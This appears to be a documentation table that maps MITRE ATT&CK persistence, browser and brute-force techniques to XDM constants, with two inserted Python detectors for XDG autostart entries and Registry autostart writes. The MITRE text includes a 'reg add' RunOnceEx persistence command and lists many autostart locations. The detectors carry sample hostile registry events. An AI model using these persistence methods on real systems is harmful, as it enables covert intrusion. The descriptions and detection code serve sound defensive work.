Original Mapped Description
T1547.012 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PRINT_PROCESSORS Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or
privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe,
during boot. Adversaries may abuse the print spooler service by adding print processors that load malicious
DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an
account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to
the print spooler service by adding the HKLM\SYSTEM\[CurrentControlSet or
ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows
x64]\Print Processors\[user defined]\Driver Registry key that points to the DLL. For the print
processor to be correctly installed, it must be located in the system print-processor directory that can be
found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018)
After the print processors are installed, the print spooler service, which starts during boot, must be restarted
in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM
level permissions, therefore print processors installed by an adversary may run under elevated privileges.
https://attack.mitre.org/techniques/T1547/012
T1547.007 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_RE_OPENED_APPLICATIONS Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac
OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their
machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app
basis, there are property list files (plist) that contain this information as well located at ~/Library/
Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/
com.apple.loginwindow.*.plist. An adversary can modify one of these files directly to include a link
to their malicious executable to provide a persistence mechanism each time the user reboots their machine
(Citation: Methods of Mac Malware Persistence). https://attack.mitre.org/techniques/T1547/007
T1547.001 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_REGISTRY_RUN_KEYS_OR_STARTUP_FOLDER Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a
Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program
referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be
executed under the context of the user and will have the account's associated permissions level. Placing a
program within a startup folder will also cause that program to execute when a user logs in. There is a
startup folder location for individual user accounts as well as a system-wide startup folder that will be
checked regardless of which user account logs in. The startup folder path for the current user is
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup
folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The
following run keys are created by default on Windows systems: *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Run keys may exist
under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node
2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also
available but is not created by default on Windows Vista and newer. Registry run key entries can reference
programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it
is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:
\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be
used to set startup folder items for persistence: *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell
Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders The following Registry keys can control automatic startup of services during boot: *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy
settings to specify startup programs creates corresponding values in either of two Registry keys: *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run The
Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of
these actions are under the control of the operating system, but you can also add custom actions here. The
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys
can automatically launch programs. Programs listed in the load value of the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user
logs on. By default, the multistring BootExecute value of the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck
autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the
system has been shut down abnormally. Adversaries can add other programs or processes to this registry
value which will automatically launch at boot. Adversaries can use these configuration locations to execute
malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may
also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if
they are associated with legitimate programs. https://attack.mitre.org/techniques/T1547/001
T1547.005 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_SECURITY_SUPPORT_PROVIDER Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots.
Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once
loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in
Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is
stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may
modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when
the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) https://attack.mitre.org/
techniques/T1547/005
T1547.009 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_SHORTCUT_MODIFICATION Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or
symbolic links are ways of referencing other files or programs that will be opened or executed when the
shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute
their tools for persistence. They may create a new shortcut as a means of indirection that may use
[Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries
could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead
of the intended legitimate program. https://attack.mitre.org/techniques/T1547/009
T1547.003 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_TIME_PROVIDERS Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service
(W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb
2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources
and outputting these values to other network clients. (Citation: Microsoft TimeProvider) Time providers are
implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation:
Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and
starts time providers listed and enabled under this key at system startup and/or whenever parameters are
changed. (Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish
persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator
privileges are required for time provider registration, though execution will run in the context of the Local
Service account. (Citation: Github W32Time Oct 2017) https://attack.mitre.org/techniques/T1547/003
T1547.004 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_WINLOGON_HELPER_DLL Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure
attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in
HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional
helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs
and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to
abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package
DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization
program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed
when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious
code and establish persistence. https://attack.mitre.org/techniques/T1547/004
T1547.013 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_XDG_AUTOSTART_ENTRIES Adversaries may modify XDG autostart entries to execute programs or commands during system boot.
Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries.
These entries will allow an application to automatically start during the startup of a desktop environment
after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or
~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application
Autostart Feb 2006) Within an XDG autostart entry file, the Type key specifies if the entry is an application
(type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the
creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free
Desktop Entry Keys) Adversaries may use XDG autostart entries to maintain persistence by executing
malicious commands and payloads, such as remote access tools, during the startup of a desktop
environment. Commands included in XDG autostart entries will execute after user logon in the context of
the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/
T1036) to make XDG autostart entries look as if they are associated with legitimate programs. https://
attack.mitre.org/techniques/T1547/013
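The T1547.013 description names the keys that matter in a .desktop autostart entry (Type, Name, Exec) and the masquerading risk. The following is an added example, not code from the XSIAM documentation or from MITRE: a small parser for that format plus two heuristics, flagging an entry whose program lives in a user-writable or hidden location, or whose Exec starts a shell or interpreter with an inline command. The path prefixes, the interpreter list and the three sample entries are constructed assumptions for this example, not a vetted baseline.

```python
"""Audit XDG autostart entries (T1547.013).

Added example, not from the XSIAM documentation or MITRE. Path lists and sample
entries are constructed assumptions.
"""
import os
import shlex
from typing import Dict, List, Tuple

AUTOSTART_DIRS = ("/etc/xdg/autostart", os.path.expanduser("~/.config/autostart"))
# Assumption: locations an unprivileged user can write to (hidden dirs are checked separately).
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/", "~/")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return key/value pairs from the [Desktop Entry] group only.

    Keys are case-sensitive per the spec; comment lines and other groups
    (e.g. [Desktop Action ...]) are skipped.
    """
    entry: Dict[str, str] = {}
    in_main = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_main = line == "[Desktop Entry]"
            continue
        if in_main and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def exec_argv(entry: Dict[str, str]) -> List[str]:
    """Split Exec= into argv; field codes such as %U are left in place."""
    exec_val = entry.get("Exec", "")
    try:
        return shlex.split(exec_val)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return exec_val.split()


def audit_entry(entry: Dict[str, str]) -> List[str]:
    """Return reasons the entry looks suspicious; an empty list means nothing flagged."""
    reasons: List[str] = []
    argv = exec_argv(entry)
    if not argv:
        return ["no Exec key"]
    prog = argv[0]
    if prog.startswith(WRITABLE_PREFIXES) or "/." in prog:
        reasons.append(f"Exec program in user-writable or hidden location: {prog}")
    if os.path.basename(prog) in INTERPRETERS and "-c" in argv[1:]:
        reasons.append("Exec runs an interpreter with an inline command")
    return reasons


def scan_autostart(dirs: Tuple[str, ...] = AUTOSTART_DIRS) -> List[Tuple[str, str, List[str]]]:
    """Scan real autostart directories; returns (path, Name, reasons) for flagged entries."""
    flagged = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for fn in sorted(os.listdir(d)):
            if not fn.endswith(".desktop"):
                continue
            path = os.path.join(d, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                entry = parse_desktop_entry(fh.read())
            reasons = audit_entry(entry)
            if reasons:
                flagged.append((path, entry.get("Name", ""), reasons))
    return flagged


# Constructed samples: a masquerading entry, a benign one, and an inline-shell one.
MASQUERADING_ENTRY = """[Desktop Entry]
Type=Application
Name=Software Updater
Comment=Checks for updates
# program hidden under the user's home directory
Exec=/home/dev/.local/share/.cache/updater --silent %U
X-GNOME-Autostart-enabled=true

[Desktop Action Check]
Name=Check now
Exec=/usr/bin/true
"""

BENIGN_ENTRY = """[Desktop Entry]
Type=Application
Name=Network Manager Applet
Exec=/usr/bin/nm-applet
"""

INLINE_SHELL_ENTRY = """[Desktop Entry]
Type=Application
Name=Welcome
Exec=/bin/sh -c "xdg-open /usr/share/doc/welcome.html"
"""

if __name__ == "__main__":
    for sample in (MASQUERADING_ENTRY, BENIGN_ENTRY, INLINE_SHELL_ENTRY):
        e = parse_desktop_entry(sample)
        print(e.get("Name"), "->", audit_entry(e) or "ok")
    for path, name, reasons in scan_autostart():
        print(path, name, reasons)
```

The heuristics deliberately ignore Hidden= and NoDisplay=: Hidden=true disables the entry, and NoDisplay=true is common in legitimate autostart files, so neither is evidence on its own.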
T1037 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.
Initialization scripts can be used to perform administrative functions, which may often execute other
programs or send information to an internal logging server. These scripts can vary based on operating
system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence
on a single system. Depending on the access configuration of the logon scripts, either local credentials or
an administrator account may be necessary. An adversary may also be able to escalate their privileges
since some boot or logon initialization scripts run with higher privileges. https://attack.mitre.org/techniques/
T1037
T1037.002 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_LOGON_SCRIPT_MAC Adversaries may use macOS logon scripts automatically executed at logon initialization to establish
persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user
logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike
[Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root
user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a
single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to
insert additional malicious code. There can only be one login hook at a time though and depending on the
access configuration of the hooks, either local credentials or an administrator account may be necessary.
https://attack.mitre.org/techniques/T1037/002
T1037.001 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_LOGON_SCRIPT_WINDOWS Adversaries may use Windows logon scripts automatically executed at logon initialization to establish
persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a
system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the
HKCU\Environment\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access
configuration of the logon scripts, either local credentials or an administrator account may be necessary.
https://attack.mitre.org/techniques/T1037/001
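The Windows persistence descriptions above (T1547.001, T1547.003, T1547.004, T1547.005, T1547.010, T1547.012 and T1037.001) each name concrete Registry locations. The following is an added example, not code from the XSIAM documentation or from MITRE: it turns those locations into a rule table that maps a registry-write event to the XDM_CONST.MITRE_TECHNIQUE_* constant it evidences, so an ingest or detection step can tag the event. The event shape (a dict with key, value and data) and the sample events are constructed for this example; Winlogon Userinit/Shell writes, which MITRE lists under both T1547.001 and T1547.004, are assigned here to the more specific T1547.004.

```python
"""Map Windows Registry autostart writes to XDM MITRE technique constants.

Added example, not from the XSIAM documentation or MITRE. Event shape and
sample events are constructed.
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

RUN = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_REGISTRY_RUN_KEYS_OR_STARTUP_FOLDER"
TIME_PROVIDERS = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_TIME_PROVIDERS"
WINLOGON = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_WINLOGON_HELPER_DLL"
SSP = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_SECURITY_SUPPORT_PROVIDER"
PORT_MONITORS = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PORT_MONITORS"
PRINT_PROCESSORS = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PRINT_PROCESSORS"
LOGON_SCRIPT = "XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_LOGON_SCRIPT_WINDOWS"

# Path fragments as they look after normalize_key(): hive abbreviated,
# Wow6432Node removed, ControlSetNNN folded into CurrentControlSet.
_CV = r"(?:HKLM|HKCU)\\Software\\Microsoft\\Windows\\CurrentVersion"
_NT = r"(?:HKLM|HKCU)\\Software\\Microsoft\\Windows NT\\CurrentVersion"
_SYS = r"HKLM\\System\\CurrentControlSet"

# (key pattern, value-name pattern or None for any value, technique).
# Matched with re.fullmatch, case-insensitively; first match wins.
RULES: List[Tuple[str, Optional[str], str]] = [
    (_SYS + r"\\Control\\Lsa(?:\\OSConfig)?", r"Security Packages", SSP),
    (_SYS + r"\\Services\\W32Time\\TimeProviders\\[^\\]+", None, TIME_PROVIDERS),
    (_SYS + r"\\Control\\Print\\Monitors\\[^\\]+", None, PORT_MONITORS),
    (_SYS + r"\\Control\\Print\\Environments\\[^\\]+\\Print Processors\\[^\\]+", r"Driver", PRINT_PROCESSORS),
    (_SYS + r"\\Control\\Session Manager", r"BootExecute", RUN),
    (_NT + r"\\Winlogon", r"Userinit|Shell", WINLOGON),
    (_NT + r"\\Winlogon\\Notify(?:\\[^\\]+)?", None, WINLOGON),
    (_NT + r"\\Windows", r"load", RUN),
    (_CV + r"\\(?:Run|RunOnce|RunServices|RunServicesOnce)", None, RUN),
    (_CV + r"\\RunOnceEx\\\d+(?:\\Depend)?", None, RUN),
    (_CV + r"\\Policies\\Explorer\\Run", None, RUN),
    (_CV + r"\\Explorer\\(?:User )?Shell Folders", None, RUN),
    (r"HKCU\\Environment", r"UserInitMprLogonScript", LOGON_SCRIPT),
]

_HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}


def normalize_key(key: str) -> str:
    """Canonicalize a key path so one rule covers its common spellings."""
    key = key.strip().strip("\\")
    hive, _, rest = key.partition("\\")
    hive = _HIVES.get(hive.upper(), hive.upper())
    rest = re.sub(r"\\Wow6432Node(?=\\)", "", rest, flags=re.IGNORECASE)
    rest = re.sub(r"\\ControlSet\d{3}(?=\\)", r"\\CurrentControlSet", rest, flags=re.IGNORECASE)
    return f"{hive}\\{rest}"


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return the technique constant evidenced by a registry-write event, or None."""
    key = normalize_key(event.get("key", ""))
    value = event.get("value") or ""
    for key_re, value_re, technique in RULES:
        if re.fullmatch(key_re, key, re.IGNORECASE) and (
            value_re is None or re.fullmatch(value_re, value, re.IGNORECASE)
        ):
            return technique
    return None


def technique_counts(events: Iterable[Dict[str, str]]) -> Dict[str, int]:
    """Aggregate hits per technique over a batch of events."""
    counts: Dict[str, int] = {}
    for ev in events:
        t = classify(ev)
        if t:
            counts[t] = counts.get(t, 0) + 1
    return counts


# Constructed registry-write events; the last one is benign.
SAMPLE_EVENTS = [
    {"key": r"HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\Public\svc.exe"},
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend",
     "value": "1", "data": r"C:\temp\payload.dll"},
    {"key": r"HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\winprint2",
     "value": "Driver", "data": "pp.dll"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa",
     "value": "Security Packages", "data": "kerberos msv1_0 schannel wdigest tspkg pku2u custom_ssp"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClientX",
     "value": "DllName", "data": r"C:\Windows\Temp\tp.dll"},
    {"key": r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "value": "Userinit", "data": r"C:\Windows\system32\userinit.exe,C:\ProgramData\init.exe"},
    {"key": r"HKCU\Environment", "value": "UserInitMprLogonScript", "data": r"C:\Users\bob\logon.bat"},
    {"key": r"HKCU\Software\Microsoft\Office\16.0\Word\Options", "value": "Foo", "data": "bar"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), "<-", ev["key"], ev["value"])
    print(technique_counts(SAMPLE_EVENTS))
```

Classification only says which autostart location was touched; whether the write is malicious still depends on the data written (an unsigned DLL in a temp directory versus a vendor-installed provider), which is why the sample events carry the data field alongside key and value.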
T1037.003 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_NETWORK_LOGON_SCRIPT Adversaries may use network logon scripts automatically executed at logon initialization to establish
persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.
(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned
to. Depending on the systems within the network, initializing one of these scripts could apply to more than
one or potentially all systems. Adversaries may use these scripts to maintain persistence on a network.
Depending on the access configuration of the logon scripts, either local credentials or an administrator
account may be necessary. https://attack.mitre.org/techniques/T1037/003
T1037.004 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_RC_SCRIPTS Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like
system’s startup. These files allow system administrators to map and start custom services at startup for
different run levels. RC scripts require root privileges to modify. Adversaries can establish persistence by
adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific
to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map
2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. Adversary
abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as
default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) Several Unix-like systems have
moved to systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS
in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco
Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and
earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To
maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist
with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) https://attack.mitre.org/techniques/
T1037/004
T1037.005 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_STARTUP_ITEMS Adversaries may use startup items automatically executed at boot initialization to establish persistence.
Startup items execute during the final phase of the boot process and contain shell scripts or other
executable files along with configuration information used by the system to determine the execution order
for all startup items. (Citation: Startup Items) This is technically a deprecated technology (superseded by
[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder,
/Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by
default on macOS Sierra. A startup item is a directory whose executable and configuration property list
(plist), StartupParameters.plist, reside in the top-level directory. An adversary can create the
appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation:
Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of
macOS, they will run as the elevated root user. https://attack.mitre.org/techniques/T1037/005
T1217 XDM_CONST.MITRE_TECHNIQUE_BROWSER_BOOKMARK_DISCOVERY Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser
bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as
well as details about internal network resources such as servers, tools/dashboards, or other related
infrastructure. Browser bookmarks may also highlight additional targets after an adversary has access to
valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated
with logins cached by a browser. Specific storage locations vary based on platform and/or application, but
browser bookmarks are typically stored in local files/databases. https://attack.mitre.org/techniques/T1217
T1176 XDM_CONST.MITRE_TECHNIQUE_BROWSER_EXTENSIONS Adversaries may abuse Internet browser extensions to establish persistent access to victim systems.
Browser extensions or plugins are small programs that can add functionality and customize aspects of
Internet browsers. They can be installed directly or through a browser's app store and generally have
access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)
(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through
malicious app store downloads masquerading as legitimate extensions, through social engineering, or by
an adversary that has already compromised a system. Security can be limited on browser app stores so it
may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome
Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url
to install updates from an adversary controlled server or manipulate the mobile configuration file to silently
install additional extensions. Prior to macOS 11, adversaries could silently install browser extensions
via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the
use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be
planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension
is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)
(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including
credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome
Extension) and be used as an installer for a RAT for persistence. There have also been instances of
botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet)
There have also been similar examples of extensions being used for command & control.(Citation: Chrome
Extension C2 Malware) https://attack.mitre.org/techniques/T1176
T1185 XDM_CONST.MITRE_TECHNIQUE_BROWSER_SESSION_HIJACKING Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to
change content, modify user-behaviors, and intercept information as part of various browser session
hijacking techniques.(Citation: Wikipedia Man in the Browser) A specific example is when an adversary
injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client
certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt
Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as
pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/
administrator rights. Another example involves pivoting browser traffic from the adversary's browser through
the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic
in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary
assumes the security context of whichever browser process the proxy is injected into. Browsers typically
create a new process for each tab that is opened and permissions and certificates are separated
accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet,
such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through
the browser and for which the browser has sufficient permissions. Browser pivoting may also bypass security
provided by 2-factor authentication.(Citation: cobaltstrike manual) https://attack.mitre.org/techniques/T1185
T1110 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or
when password hashes are obtained. Without knowledge of the password for an account or set of
accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.
Brute forcing passwords can take place via interaction with a service that will check the validity of those
credentials or offline against previously acquired credential data, such as password hashes. Brute forcing
credentials may take place at various points during a breach. For example, adversaries may attempt to
brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim
environment leveraging knowledge gathered from other post-compromise behaviors such as [OS
Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://
attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/
T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote
Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access. https://attack.mitre.org/
techniques/T1110
T1110.004 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_CREDENTIAL_STUFFING Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) https://attack.mitre.org/techniques/T1110/004
